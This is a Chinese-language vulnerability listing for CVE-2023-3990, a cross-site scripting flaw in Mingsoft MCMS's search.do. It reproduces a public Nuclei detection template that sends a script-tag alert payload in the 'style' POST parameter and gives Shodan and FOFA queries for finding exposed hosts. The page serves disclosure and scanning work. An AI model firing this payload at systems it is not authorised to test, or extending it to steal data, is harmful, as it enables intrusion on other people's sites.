CVE-2023-3990: Mingsoft MCMS < 5.3.1 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: Mingsoft MCMS | POC: 已公开

漏洞描述

A vulnerability classified as problematic has been found in Mingsoft MCMS up to 5.3.1. This affects an unknown part of the file search.do of the component HTTP POST Request Handler. The manipulation of the argument style leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-235611.

PoC代码[已公开]

id: CVE-2023-3990

info:
  name: Mingsoft MCMS < 5.3.1 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    A vulnerability classified as problematic has been found in Mingsoft MCMS up to 5.3.1. This affects an unknown part of the file search.do of the component HTTP POST Request Handler. The manipulation of the argument style leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-235611.
  impact: |
    Successful exploitation could lead to unauthorized access to sensitive data.
  remediation: |
    We recommend that you update to the latest version 5.4 or above.
  reference:
    - https://gitee.com/mingSoft/MCMS/issues/I7K4DQ
    - https://nvd.nist.gov/vuln/detail/CVE-2023-3990
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-3990
    cwe-id: CWE-79
    epss-score: 0.10685
    epss-percentile: 0.93041
    cpe: cpe:2.3:a:mingsoft:mcms:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: mingsoft
    product: mcms
    shodan-query: http.favicon.hash:1464851260
    fofa-query: icon_hash="1464851260"
  tags: cve,cve2023,mingsoft,mcms,xss

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        words:
          - "mingsoft.net"
        internal: true

  - raw:
      - |
        POST /mcms/search.do HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        content_title=1&style=%3CScRiPt%3Ealert(document.domain)%3C%2FScRiPt%3Ealert

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<ScRiPt>alert(document.domain)</ScRiPt>alert"

      - type: word
        part: content_type
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a0046304402207f8c51d66784c54937c53bfb15760d2de83871460388a0760ec69c684996802b02202c333b939bdcf526508182dc84ded61dd00956dd60f7c28649b0777d31f87d75:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-3990.yaml

相关漏洞推荐